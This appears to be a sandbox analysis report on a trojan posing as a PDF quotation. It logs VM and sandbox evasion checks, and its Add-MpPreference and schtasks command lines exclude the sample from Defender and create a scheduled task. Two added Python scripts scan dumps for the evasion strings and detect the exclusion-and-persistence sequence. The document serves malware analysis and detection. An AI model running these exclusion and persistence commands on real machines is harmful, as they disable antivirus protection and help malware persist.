                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process information set: NOOPENFILEERRORBOX (51 identical entries)

Malware Analysis System Evasion

Source: Yara match | File source: 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 6248 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6764 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6848 | Thread sleep count: 7498 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6928 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6852 | Thread sleep count: 815 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4760 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4800 | Thread sleep count: 3332 > 30
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4800 | Thread sleep count: 5748 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 661
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 815
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Window / User API: threadDelayed 3332
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Window / User API: threadDelayed 5748
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Thread delayed: delay time: 922337203685477
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.304363401.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: eZUFMybyZvmCI51dXuO
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Code function: 10_2_06498F98 LdrInitializeThunk, 10_2_06498F98
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Memory allocated: page read and write | page guard
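Added example, not part of the Joe Sandbox report and not code from the sample: a scanner that looks for the anti-analysis indicator strings listed in this section (Sandboxie's SbieDll.dll, Wine's kernel32 export, the VMware Tools path and registry key, the VMware SVGA II adapter name, and the Win32_BaseBoard / Win32_Processor / Win32_NetworkAdapterConfiguration WMI classes) in a process memory dump. It searches for both ASCII and UTF-16LE forms, because a .NET sample like this one keeps its own string literals as UTF-16 while values read back from the registry or WMI may land in ANSI buffers. The indicator list, the meanings attached to each hit and the dump bytes are constructed here; scan_file() takes a real .sdmp from the report.

```python
"""Scan a process memory dump for anti-analysis indicator strings in both
ASCII and UTF-16LE form. Added example; the indicators come from the report
above, the dump below is constructed so the script runs offline."""
import re
from typing import Dict, List, Tuple

# Indicator -> what a match lets the sample learn (all taken from the report).
INDICATORS: Dict[str, str] = {
    "SbieDll.dll": "Sandboxie",
    "wine_get_unix_file_name": "Wine",
    "VMware Tools": "VMware Tools install path or registry key",
    "VMware SVGA II": "VMware display adapter",
    "Win32_BaseBoard": "WMI baseboard query (manufacturer/serial)",
    "Win32_Processor": "WMI CPU query",
    "Win32_NetworkAdapterConfiguration": "WMI NIC query (MAC, adapter name)",
}

Hit = Tuple[str, str, int, str]  # (indicator, meaning, offset, encoding)


def _compiled():
    """One case-insensitive byte pattern per indicator and encoding.
    Matching only the ASCII form would miss the sample's own UTF-16 literals."""
    out = []
    for text, meaning in INDICATORS.items():
        for enc in ("ascii", "utf-16-le"):
            pat = re.compile(re.escape(text.encode(enc)), re.IGNORECASE)
            out.append((text, meaning, enc, pat))
    return out


PATTERNS = _compiled()


def scan_dump(dump: bytes) -> List[Hit]:
    """Return every indicator hit in the buffer, ordered by offset."""
    hits: List[Hit] = []
    for text, meaning, enc, pat in PATTERNS:
        for m in pat.finditer(dump):
            hits.append((text, meaning, m.start(), enc))
    return sorted(hits, key=lambda h: h[2])


def scan_file(path: str) -> List[Hit]:
    """Scan a dump on disk, e.g. one of the .sdmp files named in the report."""
    with open(path, "rb") as fh:
        return scan_dump(fh.read())


def fingerprints(hits: List[Hit]) -> List[str]:
    """Collapse hits into the set of environments the sample can recognise."""
    return sorted({meaning for _, meaning, _, _ in hits})


# Constructed dump: literals from the binary appear as UTF-16LE, while data
# read back from the registry or WMI may sit in an ANSI buffer.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "SbieDll.dll".encode("utf-16-le")
    + b"\x00" * 8
    + b"SOFTWARE\\VMware, Inc.\\VMware Tools"
    + b"\x00" * 8
    + "SELECT * FROM Win32_Processor".encode("utf-16-le")
    + b"\x00" * 8
    + b"VMWARE SVGA II"  # upper case on purpose: matching is case-insensitive
)

if __name__ == "__main__":
    for ind, meaning, off, enc in scan_dump(SAMPLE_DUMP):
        print(f"0x{off:06x} {enc:9s} {ind:34s} -> {meaning}")
    print("fingerprints:", ", ".join(fingerprints(scan_dump(SAMPLE_DUMP))))
```

The string "vmware" on its own is deliberately not in the list: as the eZUFMybyZvmCI51dXuO line above shows, a bare "vm" substring also fires on obfuscated identifiers, so the scanner keys on the longer, tool-specific strings.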

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Process created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
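Added example, not part of the report and not any vendor's rule content: detection logic for the process-creation sequence listed above, run over constructed Sysmon-style records. It flags powershell.exe adding a Defender exclusion (rated high when the excluded path is under the user's Desktop, Downloads or AppData, medium otherwise), schtasks.exe creating a task from an XML file in the user's Temp directory, and escalates when one parent image does both, which is exactly what this sample's Desktop executable does. The record field names (parent_image, image, command_line) are an assumption about your log pipeline; the event list is built from the command lines shown above plus two benign ones, and the -ExclusionProcess form is covered as a generalization the report itself does not show. The patterns tolerate the stray quote after the exe path that the captured command lines carry.

```python
"""Flag Defender-exclusion and scheduled-task activity in process-creation
records. Added example; field names are assumed, sample events constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Locations a standard user can write to; an exclusion or task pointing here
# is the interesting case, an admin excluding a vendor directory is not.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

# Quotes are optional everywhere because the captured command lines above
# keep a stray quote after the executable path.
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\b.*?-Exclusion(Path|Process)\s+"?([^"]+)', re.IGNORECASE)
SCHTASKS_RE = re.compile(
    r'schtasks(?:\.exe)?"?\s+/create\b.*?/tn\s+"?([^"\s]+)"?.*?/xml\s+"?([^"]+)',
    re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


def check(ev: ProcessEvent) -> List[Finding]:
    """Rules for a single process-creation record."""
    out: List[Finding] = []
    image = ev.image.lower()
    m = EXCLUSION_RE.search(ev.command_line)
    if m and image.endswith("powershell.exe"):
        target = m.group(2).strip()
        sev = "high" if USER_WRITABLE.search(target) else "medium"
        out.append(Finding("defender_exclusion_added",
                           f"{sev}: -Exclusion{m.group(1)} {target}"))
    m = SCHTASKS_RE.search(ev.command_line)
    if m and image.endswith("schtasks.exe") and TEMP_DIR.search(m.group(2)):
        out.append(Finding("schtask_from_temp_xml",
                           f"task {m.group(1)} defined by {m.group(2).strip()}"))
    if out and USER_WRITABLE.search(ev.parent_image):
        for f in out:
            f.detail += f" (parent runs from {ev.parent_image})"
    return out


def correlate(events: List[ProcessEvent]) -> Dict[str, str]:
    """Group rule hits by parent image. A parent that both excludes itself
    from Defender and registers a task is the sequence this report shows."""
    rules: Dict[str, set] = {}
    for ev in events:
        for f in check(ev):
            rules.setdefault(ev.parent_image, set()).add(f.rule)
    both = {"defender_exclusion_added", "schtask_from_temp_xml"}
    return {parent: ("exclusion_plus_persistence" if both <= seen
                     else ", ".join(sorted(seen)))
            for parent, seen in rules.items()}


PARENT = r"C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed from the report's command lines
    ProcessEvent(PARENT, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                 r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"'),
    ProcessEvent(PARENT, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                 r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe"'),
    ProcessEvent(PARENT, r"C:\Windows\SysWOW64\schtasks.exe",
                 r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" '
                 r'/XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp"'),
    # benign: an admin reading preferences, and excluding a vendor directory
    ProcessEvent(r"C:\Windows\explorer.exe", PS, r'powershell.exe Get-MpPreference'),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\SQL Server\"'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in check(ev):
            print(f"[{f.rule}] {f.detail}")
    print(correlate(SAMPLE_EVENTS))
```

On a live host the same two facts are visible without logs: (Get-MpPreference).ExclusionPath lists the excluded paths and the task registered under the Updates folder shows up in Get-ScheduledTask, so the rules above are a way to catch the sequence at the time it happens rather than after the fact.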
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
